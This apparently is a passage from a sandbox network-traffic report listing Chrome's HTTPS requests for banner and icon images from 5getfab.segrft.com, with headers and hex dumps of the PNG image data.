                                                      Date: Sun, 12 Jan 2025 23:47:55 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 10801
                                                      Connection: close
                                                      Last-Modified: Wed, 27 Jan 2021 13:29:44 GMT
                                                      ETag: "60116ac8-2a31"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:55 UTC3740INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b9 00 00 00 fe 08 03 00 00 00 51 2e 54 ba 00 00 02 fd 50 4c 54 45 00 00 00 05 50 49 5f 73 83 10 67 5b 00 60 55 16 62 5c 00 62 56 00 62 56 00 63 57 00 62 56 00 63 57 02 4e 47 1d 42 42 02 4e 47 02 4e 47 ff ff ff 28 25 2b 2a 2b 35 5f 73 83 00 57 4d 00 5b 50 00 63 57 00 60 54 fe e4 19 00 5e 52 28 27 2f 01 4d 45 00 50 47 00 52 48 00 4b 42 00 54 4a 02 38 32 21 22 29 1c 1c 23 c0 d3 d1 17 18 1d 01 48 40 00 9f 7b 10 b6 9b 01 30 2c 02 40 3a 0f ad 94 e0 ea e9 26 2a 33 ef f4 f3 12 13 17 81 a7 a3 41 7b 75 12 c1 a5 01 48 43 10 bd a1 01 43 3c 0e 9f 87 04 67 57 8a 8b 8e be be 26 cf df dd 7f aa a5 40 82 7a 19 34 36 0d 8f 7a 06 6f 5f 33 70 6b 09 54 4c a0 bd ba c0 d5 d3 09 7f 6c 12 5a 53 40 44 4c b0 c8 c5 8f b1 ae 21
                                                      Data Ascii: PNGIHDRQ.TPLTEPI_sg[`Ub\bVbVcWbVcWNGBBNGNG(%+*+5_sWM[PcW`T^R('/MEPGRHKBTJ82!")#H@{0,@:&*3A{uHCC<gW&@z46zo_3pkTLlZS@DL!
                                                      2025-01-12 23:47:55 UTC4096INData Raw: 65 ef b1 5b 30 80 d4 bd 54 5b f5 55 dd e5 10 d9 3d 1f e0 29 ea 5c 79 3e 4a 6b e9 e6 6f e5 ec 52 e3 9f 8c d0 83 9c c1 f8 fc 10 7f 6c f2 fe c3 f1 c0 b1 33 f3 5a ba 41 13 76 70 f3 1f cb 20 6b e8 26 57 f2 98 df c2 e0 b8 f8 c9 6f 1b c6 64 f8 fb e9 2e c7 f0 51 46 09 6f 47 74 9c 7f 5a 1e e5 13 34 88 23 bb 77 ef b6 1f 16 e9 8f 18 e6 bf 90 1b 46 02 34 7d 18 4e 50 31 fc 95 04 d0 a3 88 8e f3 8b 72 56 70 38 06 07 1d 0e 9b 60 20 8c 5a 6e 51 57 3c 3f 44 d3 11 70 cb c9 31 0f 36 aa e9 8b 37 18 88 23 0c 0e da 38 c6 b4 61 83 69 89 05 5e eb c6 6b e5 90 76 c9 5f 95 e9 04 86 f3 d7 13 43 14 cf 30 43 20 57 e8 c4 72 c1 c1 39 a7 77 34 6b b5 46 a3 56 6b ae 1c ae d2 0e 9b 41 6f b4 72 6c 8f 0a 17 69 5a 86 9f 67 98 c3 3c bf 8b d9 55 36 c8 74 72 b9 60 33 ed 5d db 48 65 2e c8 49 36 6a
                                                      Data Ascii: e[0T[U=)\y>JkoRl3ZAvp k&Wod.QFoGtZ4#wF4}NP1rVp8` ZnQW<?Dp167#8ai^kv_C0C Wr9w4kFVkAorliZg<U6tr`3]He.I6j
                                                      2025-01-12 23:47:55 UTC2965INData Raw: d0 14 40 29 e4 91 61 86 92 fd b3 df b3 c8 2c 71 b3 c6 1a 8d a2 7e b4 b3 de bc 92 d7 40 ae a2 90 18 35 06 47 5e 89 44 65 08 c9 02 aa 3d f9 0f a5 66 c1 dc 93 8f 84 37 10 ed d0 b3 86 2d 57 05 a2 5c f1 51 c8 6b 7f 47 04 7d e6 bb 2d 43 2d ca 38 e2 8e 63 5d a4 dc 94 3f 6f 5c c2 43 e3 41 cc 73 c0 66 28 88 31 44 75 e4 d5 80 1a 92 57 56 08 95 27 17 e6 55 10 70 ae 2c 26 71 20 79 b2 5c 2c 68 29 56 8d 86 bb d7 19 c1 35 b1 b1 4c 4e 26 5b 4a 9f 23 1f c2 c9 27 71 5f b8 43 cc 52 87 43 7d 7d 7c 3e 20 57 09 cc 00 36 82 42 74 e4 c9 eb 70 c8 a0 2d 8a 56 6d 99 32 b9 68 16 bc 78 6b bb 5b f3 94 02 6a e8 68 2f 21 d7 ae d5 da a6 ed 6a 2e d8 7b f2 12 85 83 d2 30 28 3a 5e 82 61 a8 19 00 c3 16 39 05 b8 53 25 a7 87 e4 f9 c5 e4 be 55 29 8c 07 df 93 6f 7a 8d 36 1d f2 1a 61 92 28 03 a2
                                                      Data Ascii: @)a,q~@5G^De=f7-W\QkG}-C-8c]?o\CAsf(1DuWV'Up,&q y\,h)V5LN&[J#'q_CRC}}|> W6Btp-Vm2hxk[jh/!j.{0(:^a9S%U)oz6a(


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      90192.168.2.44984120.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:55 UTC616OUTGET /images_plus/other/banner1.jpg?ver=1606891697 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:55 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:55 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 62478
                                                      Connection: close
                                                      Last-Modified: Wed, 02 Dec 2020 06:48:17 GMT
                                                      ETag: "5fc738b1-f40e"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:55 UTC3739INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 bc 00 00 00 ff 08 03 00 00 00 24 37 f5 9a 00 00 03 00 50 4c 54 45 01 00 00 0b 24 19 06 03 03 ff ff ff f0 f0 f0 13 28 1e 08 06 04 2f 89 69 0e 29 1d 07 09 08 0e 17 13 0c 13 10 04 05 05 0f 1a 16 0b 0a 05 f6 f7 f7 ed ed ed 13 24 1d 0a 10 0d 10 1e 18 12 21 1b 14 2d 22 09 0d 0a ff f7 01 13 29 22 0f 0c 06 ff fe 09 0d 02 01 e8 e8 e8 1d 3e 27 16 12 0f 17 33 23 15 03 02 14 0f 06 1d 07 04 0f 13 09 11 32 1f 26 0a 05 19 38 24 22 45 29 15 22 11 2f 0d 06 19 2a 15 1a 14 07 20 19 0b 1b 19 15 3a 11 07 29 1f 0d 7f 8c 80 27 4e 29 12 1b 0d 1d 35 1a 42 1b 0e 39 3c 3d 3b 33 13 2d 37 34 8c 9a 91 1d 26 26 24 30 2d 43 3a 1d 24 20 1c 2b 57 2c e2 e2 e2 0f 32 2a 43 50 47 31 28 0e 15 1b 20 2f 61 30 35 30 2c 2a 28 25 c5 c8 c6 39
                                                      Data Ascii: PNGIHDR$7PLTE$(/i)$!-")">'3#2&8$"E)"/* :)'N)5B9<=;3-74&&$0-C:$ +W,2*CPG1( /a050,*(%9
                                                      2025-01-12 23:47:55 UTC4096INData Raw: 60 f0 ed 93 c5 f4 c6 2d 23 3d 54 b4 f8 5b 21 11 c0 3b ee 71 c8 d5 33 2f 88 3f da 34 03 e2 32 ce 5b d7 03 ef b2 41 47 c8 bb 99 05 06 b3 eb 1a 32 03 6f 0b 33 bb 4a 73 4c 6e ee f3 2c b2 e9 b2 44 14 09 92 ec 40 70 b0 a5 13 b9 8e 8d bf e4 b5 0e 87 86 56 33 86 f7 c9 bb 8f 1f fa bf be 59 29 19 0c d7 e2 db f4 84 c0 b2 f1 aa e9 9e 3b c1 73 bc 6a c8 b7 de 05 e8 25 97 6b 75 86 b7 f4 62 ed 4c 5e 62 18 c6 05 9c 75 78 57 cf 43 5b 35 bc ef 8e 3d ae 36 50 6e 98 e3 c0 9b 7c 9c 45 9d dd c5 45 03 bc 81 27 58 60 c0 48 ef 9a df 71 42 4c bd c9 25 1b b2 1b 47 5e 34 de 77 9f 3f f4 fb 09 78 cd 79 a1 7b 8f 58 d5 85 b8 c6 62 82 77 2e 4c e4 34 24 23 4c ec e6 f8 ee 74 36 85 f5 0d 35 18 8d e8 0e b9 35 9f 21 83 2b 43 5a 62 60 82 99 dd 53 d0 e7 15 5d b3 30 27 a0 e5 42 27 6c 53 f8 76 80
                                                      Data Ascii: `-#=T[!;q3/?42[AG2o3JsLn,D@pV3Y);sj%kubL^buxWC[5=6Pn|EE'X`HqBL%G^4w?xy{Xbw.L4$#Lt655!+CZb`S]0'B'lSv
                                                      2025-01-12 23:47:55 UTC4096INData Raw: 79 99 8b 9e c6 6d 06 03 f1 bb a5 98 51 4c 35 df 9a ad 2d 5a b9 01 c0 24 96 c4 d4 cc 51 4e d1 71 35 b3 4f 3e 05 d2 4a af 02 f1 bd c3 0b 49 78 2b 95 ab a0 58 05 af 8a de e7 57 b3 f6 1e 11 7c 13 c3 0b 30 3f 9c 18 5e 7a 6a 15 bc 51 18 a7 b2 7d 62 78 18 75 a8 52 f4 0d ec 43 eb 0b 5b f0 28 83 83 ec 01 8b f0 cb 4c 57 f8 2e 76 3d 72 83 10 35 8a ef 45 03 02 fe 8a 87 9c 7d e1 e0 c2 e1 c3 33 55 fa 58 78 39 b7 74 44 a5 61 15 c5 59 7d 03 a1 10 52 c3 e2 e9 d3 93 03 e5 93 a7 27 8f fa c7 c3 79 ce 23 a3 e3 13 ea 01 5b c0 8d e1 1a c9 01 e3 b5 1b 33 ec 2e 87 0d df 59 ed 70 5f ab 11 3d 3b 01 8f 35 c3 64 a2 65 99 1c 5c be 49 39 c6 e6 82 73 83 c8 0d 29 e9 d7 5f 7e f9 fa 75 ec d7 6f e3 a0 bb db f4 f9 65 ec 95 af fd f4 a7 7f fd e9 4f 9f 7b ee fc f9 f3 5e 2f 76 fb 03 0f 6c d9 ce
                                                      Data Ascii: ymQL5-Z$QNq5O>JIx+XW|0?^zjQ}bxuRC[(LW.v=r5E}3UXx9tDaY}R'y#[3.Yp_=;5de\I9s)_~uoeO{^/vl
                                                      2025-01-12 23:47:55 UTC4096INData Raw: 47 75 d3 47 89 5d 88 c1 0b f7 cd ca ce 4e cb 4e cd 66 48 e1 9c 86 33 a4 d8 ae b4 de 42 09 6f 6e 61 de be 02 9a a0 08 63 3e e1 99 fe f1 45 18 ef f1 f1 fe 95 02 06 6f 8c f1 a6 6a 94 ca 92 b6 56 1d aa e9 48 4b 26 74 95 d5 18 fb 18 bc 08 33 a5 e5 a5 f8 8f 6a 0b fa 73 93 34 f5 86 3d 36 d0 6b b7 5a c9 58 6d 81 00 bd a6 cc 68 ca d8 95 61 44 8b 0e 66 2b 48 01 1b 6a 65 01 b3 0b 9f e1 54 70 68 af 2d 93 31 2b 95 39 3d 36 ef 1f 63 53 c4 ad 2d 3d 23 98 f2 fa 47 8a af 53 97 d3 dc 9c a3 eb c6 b4 97 6f 09 38 e2 45 12 c3 cb 8b 30 de 6f 7e b2 17 5d bb 1d 37 5f bd 19 fc 9c f1 99 8e 86 70 ef c7 2f 5e ba 74 f1 e3 1f 7f a4 8a 05 5e 1c 8d 15 df 85 f5 36 34 35 f7 28 a8 0a e1 4e 13 de fc 08 5c 9b 77 c1 77 d7 9c f0 ad cf cc e1 37 ed fc c2 9d 97 bc f6 a4 80 57 d2 b8 6e 78 77 af 7e
                                                      Data Ascii: GuG]NNfH3Bonac>EojVHK&t3js4=6kZXmhaDf+HjeTph-1+9=6cS-=#GSo8E0o~]7_p/^t^645(N\ww7Wnxw~
                                                      2025-01-12 23:47:55 UTC4096INData Raw: 73 37 98 5b 17 bc 05 02 5e 33 23 24 8b 84 d0 5c a3 e6 59 cb 18 94 cf ae 4c 1f 3a 2d b1 e1 ea e3 c0 0b 72 e5 c5 02 6f dd 5d 17 bc 4b 2e ab 5a c3 aa 55 cf 08 ad a2 d7 29 26 d7 0e b1 f6 df b5 1f 9a 03 7e 71 00 5e 2e aa c9 9e 0b 0e 0e d2 7c df 8b 7b 3b bc c8 bf e4 bd 11 3a 85 38 31 c8 f4 40 e8 ce 2f a9 fe d9 1b f7 6f be 71 7d 5f 5e 28 21 86 f8 1e 39 88 09 40 82 5d ba 52 50 45 de d5 82 5d 1e 03 ba 80 16 c2 9b 2c 98 1d 27 d6 5e 50 d4 32 bc c5 e5 e8 66 2e a4 52 27 7e 23 ec bc 8c 5d 59 a6 86 35 42 67 c4 6f 59 a7 32 ef ba 05 e5 02 5b 7a 5d 39 56 8e bc 60 7c e4 9d d1 78 24 1e 45 e3 2c 5a 13 8d a7 03 11 50 1b 05 bc c0 d7 67 a0 0a 62 94 1c bb 76 ed d8 b5 eb 83 4e 78 59 4d 99 4e 8c 7a fc 48 33 42 6e 06 a4 26 61 bc 10 bc 37 03 7c 09 5d 76 de 6c f0 76 63 45 60 95 1b ee
                                                      Data Ascii: s7[^3#$\YL:-ro]K.ZU)&~q^.|{;:81@/oq}_^(!9@]RPE],'^P2f.R'~#]Y5BgoY2[z]9V`|x$E,ZPgbvNxYMNzH3Bn&a7|]vlvcE`
                                                      2025-01-12 23:47:55 UTC4096INData Raw: 9a c4 d0 32 15 7a 3d 07 2e dd de c0 f0 92 b0 27 9b 26 94 2c d7 d2 66 a3 67 f8 13 d5 22 ba d8 79 7b 5a 50 b6 a8 e5 e5 18 48 36 7e 05 c1 0c 31 21 cc a9 57 1a f2 77 9c 51 82 7d 59 5c ac 60 eb c4 3b 7d dc 95 64 db 89 d6 3c db 02 af c8 0e 70 5f 3f 61 6b e3 d5 99 19 5c 98 ba 39 65 9b 35 05 50 95 d7 ba 73 03 a7 5f ba 00 da 86 23 3d 5b 97 3f 29 db 6e 35 cb 67 e3 4d c4 5e b1 f0 7f 6e a4 bf 1f 0b e3 86 13 46 3c 54 db 1a 4d c4 60 c6 14 7a a3 a3 d7 af ff bd 18 93 80 f7 9b f0 9e 29 cc 23 18 0d b5 dd 2b 1b ac 42 d3 aa ac a1 01 6f bb f6 08 e3 fd da a1 bc 0a 5d 23 f6 a1 74 1b ab 09 71 97 72 14 f4 c6 c2 be 38 e0 15 b1 21 87 9a 6b 01 99 1a c4 1c d1 47 c2 cb 7a ff 5c ac 3d 9d c1 84 8a 66 4c 7f c7 a8 74 e4 06 0c 56 9f 01 de a2 e7 b7 d1 2a e9 eb 55 6e 80 f2 0f e4 6b 78 f3 e9
                                                      Data Ascii: 2z=.'&,fg"y{ZPH6~1!WwQ}Y\`;}d<p_?ak\9e5Ps_#=[?)n5gM^nF<TM`z)#+Bo]#tqr8!kGz\=fLtV*Unkx
                                                      2025-01-12 23:47:55 UTC4096INData Raw: d8 44 15 a5 09 3f 3e e3 06 77 60 17 77 cc ae 8d de 8b 16 e7 bd 21 96 fa 27 3d b0 91 7b f1 72 e6 89 b5 73 50 18 bb 20 7c 54 84 85 a7 05 95 80 f6 94 de 0c f3 14 33 2b 18 c7 3b df 72 13 cd d1 21 91 5d b3 f3 36 c1 78 87 c5 18 02 d0 23 52 c3 ac 5c 5c 80 2c 2d b4 a0 da 6b 88 0d a7 09 5e 14 1b c0 ee e0 f0 e8 c9 c9 1d 25 0a 1a 09 2f 09 a6 49 5b 03 11 8e 12 5e 5b f7 19 8b 89 d6 f0 9a 0d b6 62 9a 80 29 aa bc 9c 1b a4 ca 06 b7 8d a6 1f 09 af 7a bc 6c 59 77 c5 63 c0 fb b1 cf c1 9d 1f 4b c8 0d 3c b4 4c 06 5e 9c c1 df fe 02 ce fb 0f fa 98 05 4b ce 0d 2e f1 68 07 7a 21 7b 6c 97 41 81 2f b8 4a 25 17 db 95 64 78 5b 28 3b d0 7e 6c c1 a2 1e b0 27 e1 45 42 18 a3 34 81 6f 84 50 7c 40 33 0e 3e 9c ca 64 34 bc 24 ac b8 d6 8c 07 1b b0 c2 59 33 41 2a be 6c 6e b9 08 4d 9c 97 1a 13
                                                      Data Ascii: D?>w`w!'={rsP |T3+;r!]6x#R\\,-k^%/I[^[b)zlYwcK<L^K.hz!{lA/J%dx[(;~l'EB4oP|@3>d4$Y3A*lnM
                                                      2025-01-12 23:47:55 UTC4096INData Raw: 3e 1e 1a bc c9 fe 72 44 e7 ec cb e4 5d b0 3b 1d 8d 0d 86 42 33 05 69 67 d9 a5 34 cf 2e d5 7b 23 f0 95 e2 d3 17 f6 d1 80 59 8d 12 85 34 3d 0d 7c d3 fe c3 35 3f 0c dd 06 a8 aa 81 00 7e e2 89 4d ae d8 f1 29 26 94 19 9a 01 6f 33 e0 8d 0c 26 b4 a4 b3 f0 0a 6a e1 bd 18 b4 7d ff 4f 09 58 ca 53 e4 86 d0 cf df c3 66 ea a1 77 c6 0d 52 a2 c5 8c d9 af 51 b4 a4 63 8e e2 ff 24 b8 2b 7f a6 3b a2 f5 8a 8d 1b f1 16 0e 4c 5b f1 9c 4a eb 48 54 47 58 b1 6e 3d 9e d7 33 a9 4f 14 14 a4 d6 30 65 64 fc e8 9b 82 c9 e7 01 ee e6 d5 d0 27 61 b0 5c ef 6e c9 46 25 0c ca 7e fe 6f 02 e7 1f 6d d8 b0 6a 15 ee a4 b5 10 9e 56 26 29 3d ad 6d 76 a2 f5 62 77 c8 33 3a dc e3 09 74 4f 44 c3 db 18 b9 99 ab b2 6b f7 74 f7 11 b8 fc 02 ed 76 dc 55 76 41 2d a0 65 c2 ab 9a 55 3a ac 06 f8 f5 d3 68 01 fc
                                                      Data Ascii: >rD];B3ig4.{#Y4=|5?~M)&o3&j}OXSfwRQc$+;L[JHTGXn=3O0ed'a\nF%~omjV&)=mvbw3:tODktvUvA-eU:h
                                                      2025-01-12 23:47:55 UTC4096INData Raw: 9c eb b3 1f ad c0 f0 68 e0 72 1c ce f5 36 15 40 5d 81 13 18 db 83 93 ae 48 13 5f 63 23 0b a8 49 dc f0 f1 d1 36 84 5e 8a 0d 93 dd e8 e1 29 58 b4 55 41 2e 33 2b 94 75 0b 26 8a a0 03 d8 4c 2f 10 0a b1 12 c3 d8 cc 58 ac 3b 4f fc b7 c1 22 71 2b e8 c5 36 79 3a a9 d8 b2 53 f6 a7 3e 40 01 21 bf 09 ff 20 84 b5 5f 2c 1a 2e 36 17 40 b9 e9 80 77 69 7c 1b 5e 51 94 eb f1 ea ee cb 5f be 34 d2 db de da fb 26 4b c0 d0 77 0e 1f ae 89 04 9a 1a 4e 41 e7 a6 78 47 6f c4 17 1c 19 1b 8b 1e 15 d2 b6 a4 1b 67 e7 0d 41 72 5c e3 d4 c2 9c d1 b8 10 4a 55 7f 60 07 8b 05 cf 90 9c 7c 23 f1 17 94 1b 8c 2e 4e 2d 0e 2b 98 f1 0a 5c 05 b2 32 2e 2c 29 1d ba 4b c2 2b bb 6c fc 20 d7 a5 94 d7 59 9d 7b d6 a4 b0 dc 3d fe 0a 1d bb 52 16 c5 51 a1 a3 f7 71 e1 95 25 b3 34 ae 73 23 2f b1 3a a8 b9 9e 77
                                                      Data Ascii: hr6@]H_c#I6^)XUA.3+u&L/X;O"q+6y:S>@! _,.6@wi|^Q_4&KwNAxGogAr\JU`|#.N-+\2.,)K+l Y{=RQq%4s#/:w
                                                      2025-01-12 23:47:55 UTC4096INData Raw: 7b 08 60 65 5f 46 b9 d2 21 db 20 4b e0 ac 25 40 96 4e 14 07 f0 66 32 a8 99 d7 4f 89 82 1a 1c 48 8e 76 08 f0 3e de b4 70 1a 6e 4b e1 bb 4a 5f 2b d3 37 89 61 e0 96 80 44 4d a5 0e 5e b6 cf 1d 3c 17 c2 2a 4c 3a 29 cc 5f dc 41 05 7b 52 40 78 59 7c 09 73 dc 85 04 bb fa 01 db 52 ce db d0 20 36 2d 65 f4 0a ef 65 d6 5b 9a 75 07 d8 32 bd 7c 29 64 b5 f6 3a df 12 e4 52 99 6c 17 56 8c 34 71 e7 2d ed e4 ab 87 bd 53 72 b3 32 d4 1a 68 a5 3b 5d ab 0a d7 08 42 6b d9 84 6c 49 07 bc bf f2 bd 33 ee c3 8a 91 77 42 bd 34 b6 d6 15 cd 58 4b 7a 12 b7 da ba 30 ef 81 38 98 53 95 53 c5 82 af b6 21 72 79 db 5d be f7 7c 9f 84 57 a3 52 2c c3 87 8d 3a f7 60 82 c2 e1 48 6c e2 75 a9 7d 64 eb da fc f8 8e d5 62 b5 ba da 76 89 49 0a 83 d2 86 e0 0a a4 dd 07 78 c1 76 fb 7f d2 49 b6 24 12 b5 79
                                                      Data Ascii: {`e_F! K%@Nf2OHv>pnKJ_+7aDM^<*L:)_A{R@xY|sR 6-ee[u2|)d:RlV4q-Sr2h;]BklI3wB4XKz08SS!ry]|WR,:`Hlu}dbvIxvI$y


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      91192.168.2.44985020.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:56 UTC395OUTGET /images_plus/index/en/NCDBC_210x204.png?ver=1700473741 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:56 UTC355INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:56 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 9237
                                                      Connection: close
                                                      Last-Modified: Mon, 20 Nov 2023 09:49:01 GMT
                                                      ETag: "655b2b8d-2415"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:56 UTC3741INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 d2 00 00 00 d8 08 06 00 00 00 9e 02 bd 24 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 06 78 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 36 30 2c 20 32 30 32 30 2f 30 35 2f 31 32 2d 31 36 3a 30 34 3a 31 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                      Data Ascii: PNGIHDR$pHYsxiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RD
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 18 ab b5 65 bd 2c eb 6f 34 3c 5e 82 df a8 82 00 c9 58 b6 c7 0f 50 c4 0b 22 11 1d 8e 4b 65 e4 d2 50 24 7b b7 28 d8 be 68 2a 5e 2c d4 b2 77 b0 de c8 0b 1c 6e b9 a2 3d 1c 56 00 e9 3a 4b d5 6e 94 c5 33 e9 e1 9a f6 5b 0e d9 fe e0 5f 96 a2 2d cb b3 6d db 67 85 c6 06 c6 24 6d d9 44 5b ce 33 21 44 90 ec 8d c0 5c 7f 7e b4 2a e6 40 f2 52 74 08 46 b2 e1 8e 23 09 f1 85 f4 46 2a d7 93 1b 96 79 5b 1b 91 5b 98 2a 6a 80 3c 14 1b ac 61 9c 1e 7e 59 8d 39 41 60 08 16 2f 53 51 20 19 45 8c 3f d8 f3 34 4b 91 23 76 40 62 85 7b 9e 22 a3 e5 96 8d db 60 28 5c b3 04 ba 79 bf 8a f2 46 c1 84 ad 32 89 ca ff 1e 40 b2 86 4e ba b1 6b bf b5 e6 24 91 f6 48 83 b4 c5 0b 15 40 b2 7a 50 2b 50 29 fe 0a 5f 6c 81 a4 3a 4e 5d 38 21 f2 5a 78 a8 88 90 2e 54 6f e4 a5 b2 e8 24 d9 b8 7e 1e 40 6a e1 2f
                                                      Data Ascii: e,o4<^XP"KeP${(h*^,wn=V:Kn3[_-mg$mD[3!D\~*@RtF#F*y[[*j<a~Y9A`/SQ E?4K#v@b{"`(\yF2@Nk$H@zP+P)_l:N]8!Zx.To$~@j/
                                                      2025-01-12 23:47:56 UTC1400INData Raw: eb 63 fa 3e 5f f2 44 14 83 b4 e5 7f 8e c4 3c 48 cf cd 4c d0 8d d1 f0 3e ac ad 5b 7f a4 69 2f 3d 6f 86 48 9f 64 dc 4c c7 0e ce a1 7b b4 9c c3 4d 8b 96 af a4 84 5d d7 d3 97 6b 12 cc 50 8a 0d ff a7 b5 6d 1c 7f 77 f3 bd e7 c3 bf 1b ae fa 99 76 67 3d 47 77 3e 56 d6 50 31 28 dd bb 55 31 c1 30 b6 67 fc c6 08 bf 76 7f d7 d3 dc de bf 33 cf d0 e4 19 65 f9 d1 27 0b 3e a5 9a f9 f7 9b b9 14 6f 6f ce cc c1 d4 77 c0 24 13 ac d7 5e 7b c5 84 6e f8 f0 e1 fa 73 35 6e 30 c6 8d 9b 40 3f 7d d3 85 e8 5c 51 4c df e7 0e cf 35 8c 5e 90 36 8f cd 89 79 90 d2 5f ab 66 82 34 e9 2f 83 e9 40 d6 ef f4 e5 db f6 5e 4e 63 9e da 6a 1a 77 fd 84 69 66 18 c4 21 5c 9d ba 29 c2 ed 31 8c 7b d6 df ac 85 62 5b 03 40 da fe 75 2b c7 e3 18 30 bc 6a 00 48 c7 f6 bc 1c 00 a3 b5 08 61 6c cf f8 0d e7 55 b7
                                                      Data Ascii: c>_D<HL>[i/=oHdL{M]kPmwvg=Gw>VP1(U10gv3e'>oow$^{ns5n0@?}\QL5^6y_f4/@^Ncjwif!\)1{b[@u+0jHalU


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      92192.168.2.44984920.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:56 UTC395OUTGET /images_plus/index/en/footer_tindex.png?ver=1678854633 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:56 UTC356INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:56 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 21119
                                                      Connection: close
                                                      Last-Modified: Wed, 15 Mar 2023 04:30:33 GMT
                                                      ETag: "641149e9-527f"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
